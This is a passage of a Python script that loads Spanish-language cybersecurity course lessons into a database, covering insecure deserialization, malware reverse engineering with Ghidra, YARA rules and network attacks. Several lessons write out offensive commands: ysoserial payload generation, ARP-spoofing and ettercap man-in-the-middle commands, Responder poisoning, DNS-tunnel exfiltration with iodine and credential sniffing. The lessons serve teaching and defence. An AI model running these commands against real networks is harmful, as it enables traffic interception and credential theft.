        "content": "La deserializacion insegura permite a un atacante modificar datos serializados para conseguir ejecucion de codigo, escalada de privilegios o DoS.\n\nConcepto de serializacion:\nLa serializacion convierte objetos a bytes/string para almacenarlos o transmitirlos. La deserializacion reconstruye el objeto. Si el atacante puede modificar los bytes, puede influir en los objetos creados.\n\nEjemplo en PHP:\n```php\n// Gadget chain simplificada\n$obj = unserialize($_COOKIE['session']);\n// Si la clase tiene __wakeup() o __destruct() con codigo peligroso\n// el atacante puede controlarlo\n\n// Payload malicioso (base64 del objeto serializado manipulado)\n// O:8:'UserClass':2:{s:4:'role';s:5:'admin';s:4:'name';s:5:'Mario';}\n```\n\nEjemplo en Java con ysoserial:\n```bash\njava -jar ysoserial.jar CommonsCollections6 'whoami' | base64\n# Enviar en el campo vulnerable\n```\n\nHerramientas: ysoserial (Java), PHPGGC (PHP), deserialization-cheat-sheet.\nPrevencion: no deserializar datos del usuario, firmar y verificar los datos antes de deserializar."
    },

    # ── Analisis de Malware con Ghidra ────────────────────────────────────────
    "Que es el RE y para que sirve": {
        "video": "https://www.youtube.com/watch?v=d4Pgi5XML8E",
        "content": "El Reverse Engineering (RE) o ingenieria inversa es el proceso de analizar un software para entender su funcionamiento sin tener acceso al codigo fuente.\n\nAplicaciones del RE en ciberseguridad:\n- Analisis de malware: entender que hace un virus/ransomware/trojan\n- Busqueda de vulnerabilidades en software cerrado\n- Verificacion de backdoors en software\n- CTF challenges de pwn y reversing\n- Desarrollo de patches y parches\n- Analisis forense de incidentes\n\nFormatos de binarios que analizaremos:\n- PE (Portable Executable): formato de Windows (.exe, .dll)\n- ELF (Executable and Linkable Format): formato de Linux\n- Mach-O: formato de macOS\n\nNiveles de analisis:\n1. Analisis estatico: sin ejecutar el binario (Ghidra, IDA, strings)\n2. Analisis dinamico: ejecutando el binario en sandbox (x64dbg, strace, ltrace)\n3. Analisis hibrido: combinando ambos enfoques (lo mas efectivo)"
    },
    "Instalacion y configuracion de Ghidra": {
        "video": "https://www.youtube.com/watch?v=_j_MImhFZHI",
        "content": "Ghidra es la suite de RE desarrollada por la NSA y publicada como open source en 2019. Es una alternativa gratuita y muy potente a IDA Pro.\n\nInstalacion:\n1. Descargar desde https://ghidra-sre.org/\n2. Requiere JDK 17+: sudo apt install openjdk-17-jdk\n3. Extraer y ejecutar: ./ghidraRun\n\nConfiguracion inicial recomendada:\n- Edit > Tool Options > Listing Display: aumentar font size\n- Instalar plugins utiles: GhidraNinja, ret-sync, GHIDRIFF\n- Configurar el decompiler: Edit > Options for 'Decompiler'\n\nPlugins esenciales:\n```\n# Desde Script Manager\nGhidra Script - OneShotDecompile.java\nFind References\nVersionTracking\n```\n\nTips de rendimiento:\n- Asignar mas RAM: edita ghidraRun y cambia -Xmx1024M a -Xmx4096M\n- Usar SSD para proyectos grandes\n- Deshabilita el analisis automatico para binarios muy grandes"
    },
    "La interfaz de Ghidra explicada": {
        "video": "https://www.youtube.com/watch?v=LZJIdHc0WMs",
        "content": "Entender la interfaz de Ghidra es fundamental para trabajar eficientemente. Cada ventana tiene un proposito especifico.\n\nVentanas principales:\n\n1. Program Trees: estructura del binario (secciones, segmentos)\n2. Symbol Tree: funciones, labels, imports, exports\n3. Data Type Manager: estructuras de datos conocidas\n4. Listing (Disassembly): codigo ensamblador descompilado\n5. Decompiler: pseudocodigo C generado automaticamente\n6. Function Graph: grafico de flujo de control\n\nShortcuts esenciales:\n- G: ir a una direccion\n- L: renombrar variable/funcion\n- T: cambiar el tipo de un dato\n- ; : anadir comentario\n- X: referencias cruzadas (quien llama a esta funcion)\n- Space: alternar entre listing y graph view\n- Ctrl+L: buscar labels/simbolos\n\nFlujo de trabajo tipico:\n1. Importar binario y dejar analisis automatico\n2. Explorar imports (DLL que usa el malware)\n3. Buscar strings interesantes\n4. Identificar funcion main y funciones criticas\n5. Renombrar variables y funciones para entender el flujo"
    },
    "Analisis de binarios PE y ELF": {
        "video": "https://www.youtube.com/watch?v=qzZtzMiddc8",
        "content": "Antes de abrir un binario en Ghidra, el analisis de la cabecera PE/ELF nos da informacion valiosa rapidamente.\n\nAnalisis de PE (Windows) con herramientas:\n```bash\n# strings - buscar cadenas de texto\nstrings -n 8 malware.exe | grep -iE 'http|ftp|password|key|registry'\n\n# PE-bear, pestudio, CFF Explorer (GUI)\n# floss - strings ofuscadas (FLARE Team)\nfloss malware.exe\n\n# Verificar si esta empaquetado\npeid malware.exe\nexeinfope malware.exe\n\n# Imports/exports con dumpbin (Windows)\ndumpbin /imports malware.exe\n```\n\nCampos clave del PE header que analizar:\n- Timestamp: cuando fue compilado\n- Imports: DLLs y funciones que usa (indica capacidades)\n- Sections: .text (codigo), .data (datos), .rsrc (recursos)\n- Entropy: alta entropia puede indicar packing/cifrado\n\nAnalisis ELF (Linux):\n```bash\nfile malware.elf\nreadelf -h malware.elf  # header\nreadelf -d malware.elf  # dynamic section (imports)\nldd malware.elf  # librerias dinamicas\n```"
    },
    "Identificacion de strings e imports": {
        "video": "https://www.youtube.com/watch?v=oHXaRnBBfhI",
        "content": "Las strings e imports son las pistas mas rapidas para entender las capacidades de un malware sin ejecutarlo.\n\nBusqueda de strings en Ghidra:\n- Window > Defined Strings: todas las strings del binario\n- Filtrar por: URL, IP, registry keys, API names\n- Strings sospechosas: base64, rutas del sistema, comandos\n\nImports que delatan capacidades maliciosas:\n```\n# Comunicacion de red\nWSAStartup, connect, send, recv, InternetOpen, HttpSendRequest\n\n# Sistema de archivos\nCreateFile, WriteFile, DeleteFile, CopyFile, FindFirstFile\n\n# Registro de Windows\nRegOpenKeyEx, RegSetValueEx, RegCreateKey\n(Persistencia - añadirse al inicio)\n\n# Procesos e inyeccion\nCreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory\nCreateRemoteThread (inyeccion clasica de DLL)\n\n# Anti-analisis\nIsDebuggerPresent, CheckRemoteDebuggerPresent\nSleep, QueryPerformanceCounter (delay para evitar sandboxes)\n```\n\nStrings ofuscadas: el malware moderno ofusca strings. Usa FLOSS (FireEye) para extraerlas o busca funciones de decodificacion en el decompiler."
    },
    "Descompilacion y analisis de funciones": {
        "video": "https://www.youtube.com/watch?v=TLxKs7NrmrE",
        "content": "La ventana del decompiler de Ghidra convierte el ensamblador en pseudocodigo C, facilitando enormemente el analisis.\n\nTecnicas de analisis de funciones:\n\n1. Renombrar para claridad:\n```c\n// Antes (autogenerado)\nFUN_00401234(param_1, param_2)\n\n// Despues de analisis\ndecrypt_config(encrypted_data, key)\n```\n\n2. Retype de variables (T):\n- Cambiar undefined4 por int, char*, HANDLE\n- Crear estructuras custom: Data > Create Structure\n\n3. Buscar loops tipicos de malware:\n```c\n// Loop de cifrado XOR\nfor (i = 0; i < length; i++) {\n    data[i] = data[i] ^ key[i % key_length];\n}\n```\n\n4. Identificar patrones:\n- Funciones con muchos WinAPI calls -> funcionalidad principal\n- Funciones con Sleep y IsDebuggerPresent -> anti-analisis\n- Funciones con socket calls -> C2 communication\n- Funciones con registry calls -> persistencia\n\nRecuerda: el decompiler no es perfecto. Compara siempre con el listing de ensamblador para verificar."
    },
    "Analisis de un troyano simple": {
        "video": "https://www.youtube.com/watch?v=PFnfEE0SXNQ",
        "content": "En esta leccion analizamos un troyano de acceso remoto (RAT) simple en un entorno completamente controlado y aislado de internet.\n\nEntorno seguro para analisis de malware:\n- VM aislada (sin red o red host-only)\n- Snapshot antes de ejecutar\n- Procmon, Process Hacker, Wireshark corriendo\n- Regshot para comparar cambios en el registro\n\nFlujo de analisis del troyano:\n1. Analisis estatico inicial:\n   - strings, imports, PEiD para verificar packing\n   - Abrir en Ghidra, localizar WinMain y funciones clave\n\n2. Analisis dinamico (sandbox):\n   - Ejecutar en ANY.RUN o Cuckoo Sandbox\n   - Observar: procesos creados, conexiones de red, ficheros modificados\n\n3. Identificar mecanismo de persistencia:\n   - HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n   - Carpeta de inicio: %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\n   - Tareas programadas: schtasks /query\n\n4. Identificar C2:\n   - Buscar strings con URLs o IPs\n   - Analizar funcion de comunicacion de red\n   - Wireshark: filtrar por el proceso"
    },
    "Analisis de ransomware": {
        "video": "https://www.youtube.com/watch?v=hhHjRIVEjx8",
        "content": "El ransomware es el tipo de malware mas destructivo y lucrativo. Entender como funciona es clave para la defensa.\n\nArquitectura tipica de un ransomware:\n1. Initial Access: phishing, exploit, RDP brute force\n2. Execution: ejecutar el dropper\n3. Persistence: registro, servicios, tareas programadas\n4. Discovery: enumerar ficheros y drives\n5. Defense Evasion: deshabilitar AV, shadow copies\n6. Exfiltration: robar datos antes de cifrar (double extortion)\n7. Impact: cifrar ficheros, borrar backups, mostrar ransom note\n\nTecnicas de cifrado que analizar en Ghidra:\n```c\n// Buscar imports criptograficos\nCryptGenKey, CryptEncrypt  // Windows CryptoAPI\nBCryptEncrypt              // CNG API\n// o implementaciones custom de AES/RSA\n```\n\nAnalisis de mecanismo de cifrado:\n- Identificar la funcion que itera ficheros (FindFirstFile/FindNextFile)\n- Localizar la funcion de cifrado (llamada para cada fichero)\n- Analizar si la clave se genera localmente o viene del C2\n- Determinar si hay posibilidad de recuperacion (IV fijo, semilla predecible)\n\nRecurso: NoMoreRansom.org tiene herramientas de descifrado para muchas familias conocidas."
    },
    "Escribir firmas YARA": {
        "video": "https://www.youtube.com/watch?v=dKzMPdZ_zYo",
        "content": "YARA es el estandar para escribir reglas de deteccion de malware basadas en patrones de bytes y strings.\n\nSintaxis basica de YARA:\n```yara\nrule MiTroyano_v1 {\n    meta:\n        description = 'Detecta variante del troyano X'\n        author = 'Tu Nombre'\n        date = '2024-01-01'\n        hash = 'sha256_del_sample'\n    \n    strings:\n        $mz = { 4D 5A }  // MZ header (PE)\n        $url = 'http://c2.malware.com/callback'\n        $mutex = 'Global\\\\MalwareMutex'\n        $encrypt_func = { 48 89 5C 24 ?? 57 48 83 EC 20 }\n    \n    condition:\n        $mz at 0 and\n        ($url or $mutex) and\n        $encrypt_func\n}\n```\n\nCompilar y usar:\n```bash\nyara regla.yar /ruta/a/escanear/\nyara -r regla.yar /\n```\n\nMejores practicas:\n- Combinar strings unicas con secuencias de bytes\n- Evitar FP (falsos positivos) siendo especifico\n- Probar contra colecciones de malware (MalwareBazaar) y software legitimo\n- Repositorios publicos: Yara-Rules, awesome-yara, signature-base"
    },

    # ── Redes y Protocolos para Hackers ───────────────────────────────────────
    "Modelo OSI y TCP/IP": {
        "video": "https://www.youtube.com/watch?v=vv4y_uOneC0",
        "content": "Entender los modelos OSI y TCP/IP es fundamental para cualquier profesional de seguridad. Cada vulnerabilidad de red opera en una capa especifica.\n\nModelo OSI (7 capas):\n7. Aplicacion: HTTP, DNS, FTP, SMTP\n6. Presentacion: TLS/SSL, cifrado, codificacion\n5. Sesion: NetBIOS, RPC\n4. Transporte: TCP, UDP, puertos\n3. Red: IP, ICMP, routing\n2. Enlace: Ethernet, ARP, MAC\n1. Fisica: cables, señales\n\nAtaques por capa:\n- Capa 7: XSS, SQLi, command injection, SSRF\n- Capa 4: SYN flood, port scanning\n- Capa 3: IP spoofing, ICMP flood\n- Capa 2: ARP spoofing, MAC flooding, VLAN hopping\n\nTCP Three-Way Handshake:\n```\nCliente  -->  SYN  -->  Servidor\nCliente  <--  SYN-ACK <-- Servidor  \nCliente  -->  ACK  -->  Servidor\n[Conexion establecida]\n```\n\nSYN flood: enviar millones de SYN sin completar el handshake, agotando la tabla de conexiones del servidor."
    },
    "Wireshark captura y analisis de trafico": {
        "video": "https://www.youtube.com/watch?v=lb1Dw0elw0Q",
        "content": "Wireshark es el analizador de protocolos de red mas utilizado del mundo. Esencial para debugging, analisis forense y pentesting.\n\nFiltros de display esenciales:\n```\n# Por protocolo\nhttp\ndns\narp\ntcp.port == 443\n\n# Por IP\nip.addr == 192.168.1.1\nip.src == 10.0.0.1 && ip.dst == 8.8.8.8\n\n# Buscar credenciales\nhttp.request.method == 'POST' && http contains 'password'\nftp.request.command == 'PASS'\n\n# Seguir flujo TCP\nBoton derecho > Follow > TCP Stream\n\n# Exportar objetos HTTP\nFile > Export Objects > HTTP\n```\n\nCaptura en CLI con tshark:\n```bash\ntshark -i eth0 -f 'port 80' -w captura.pcap\ntshark -r captura.pcap -Y 'http.request' -T fields -e http.host -e http.request.uri\n```\n\nAnalisis forense de red:\n- Buscar datos exfiltrados (DNS tunneling, HTTP POST grandes)\n- Identificar beaconing de C2 (peticiones regulares cada X segundos)\n- Detectar port scans (muchos RST en poco tiempo)"
    },
    "ARP Spoofing y MITM": {
        "video": "https://www.youtube.com/watch?v=RTXDJCM4LGk",
        "content": "ARP Spoofing es el ataque de red local mas clasico. Permite interceptar trafico entre dos hosts de la misma red local.\n\nComo funciona ARP:\nARP resuelve IPs a MACs en la red local. No tiene autenticacion, cualquiera puede enviar replies falsas.\n\nAtaque con arpspoof:\n```bash\n# Habilitar forwarding para no perder conexion de la victima\necho 1 > /proc/sys/net/ipv4/ip_forward\n\n# Decirle a la victima (192.168.1.5) que somos el router (192.168.1.1)\narpspoof -i eth0 -t 192.168.1.5 192.168.1.1 &\n\n# Decirle al router que somos la victima\narpspoof -i eth0 -t 192.168.1.1 192.168.1.5 &\n\n# Ahora todo el trafico pasa por nosotros\nwireshark &\n```\n\nCon ettercap (todo en uno):\n```bash\nettercap -T -M arp:remote /192.168.1.5// /192.168.1.1//\n```\n\nPrevencion:\n- Dynamic ARP Inspection (DAI) en switches gestionados\n- ARP estatico para equipos criticos\n- VLAN segmentation\n- Herramientas de deteccion: XArp, arpwatch"
    },
    "DNS Poisoning": {
        "video": "https://www.youtube.com/watch?v=8Bb0TqrHYm4",
        "content": "DNS Poisoning (o DNS Spoofing) consiste en proporcionar respuestas DNS falsas para redirigir a los usuarios a servidores controlados por el atacante.\n\nTipos de ataques DNS:\n\n1. DNS Cache Poisoning (Kaminsky Attack):\nInyectar entradas falsas en la cache de un resolver DNS.\n\n2. DNS Hijacking local:\nModificar el archivo /etc/hosts o envenenar el resolver local.\n\n3. DNS Spoofing con MITM (Responder):\n```bash\n# Responder captura y responde a peticiones LLMNR, NBT-NS, DNS\nresponder -I eth0 -rdwv\n# Victimas en la misma red que buscan nombres -> responder responde con nuestra IP\n```\n\n4. DNS Tunneling (exfiltracion):\n```bash\n# Datos codificados en subdominios DNS para exfiltrar datos\n# iodine (tuneliza IP sobre DNS)\niodined -f -c -P password 10.0.0.1 mi-dominio.com  # servidor\niodine -P password mi-dominio.com                    # cliente\n```\n\nDeteccion:\n- DNSSEC: firma criptografica de registros DNS\n- DNS over HTTPS (DoH) / DNS over TLS (DoT)\n- Monitorizar queries DNS anomalas (muchos subdominios diferentes)"
    },
    "Sniffing de credenciales": {
        "video": "https://www.youtube.com/watch?v=qHC7bSBXBZw",
        "content": "El sniffing de red permite capturar credenciales transmitidas en texto claro o con protocolos debiles.\n\nProtocolos vulnerables a sniffing:\n- HTTP: credenciales en texto claro en POST\n- FTP: usuario y password en texto claro\n- Telnet: toda la sesion en texto claro\n- SMTP/POP3/IMAP sin TLS: emails y credenciales\n- SNMPv1/v2: community strings en texto claro\n\nCaptura con Wireshark:\n```\n# Filtro para credenciales HTTP\nhttp.request.method == 'POST'\n# Seguir el stream TCP para ver usuario y password\n\n# Credenciales FTP\nftp.request.command == 'USER' or ftp.request.command == 'PASS'\n\n# Telnet (toda la sesion)\ntelnet\n```\n\nCon Ettercap y filtros:\n```bash\n# Capturar y mostrar credenciales automaticamente\nettercap -T -M arp -i eth0 /// /// -P autoadd\n```\n\nDefensa:\n- Usar siempre protocolos cifrados: HTTPS, SFTP, SSH, SMTPS\n- TLS/SSL para todos los servicios\n- Certificados validos (no self-signed en produccion)\n- HSTS para forzar HTTPS desde el navegador"
    },
}


def normalize(s):
    """Normalize lesson title for lookup (remove accents roughly, lowercase)"""
    replacements = {
        'á': 'a', 'é': 'e', 'í': 'i', 'ó': 'o', 'ú': 'u',
        'Á': 'A', 'É': 'E', 'Í': 'I', 'Ó': 'O', 'Ú': 'U',
        'ü': 'u', 'ñ': 'n', 'Ã': 'A', 'ã': 'a',
    }
    for orig, rep in replacements.items():
        s = s.replace(orig, rep)
    return s.lower().strip()


lessons = Lesson.objects.all()
updated = 0
not_found = []

for lesson in lessons:
    norm_title = normalize(lesson.title)
    matched = None
    for key, data in LESSON_DATA.items():
        if normalize(key) in norm_title or norm_title in normalize(key):
            matched = data
            break
    if matched:
        lesson.video_url = matched["video"]
        lesson.content_type = "video"
        lesson.content = matched["content"]
        lesson.save()
        updated += 1
    else:
        not_found.append(lesson.title)

print(f"Lecciones actualizadas: {updated}")
if not_found:
    print(f"Sin match ({len(not_found)}): {not_found}")
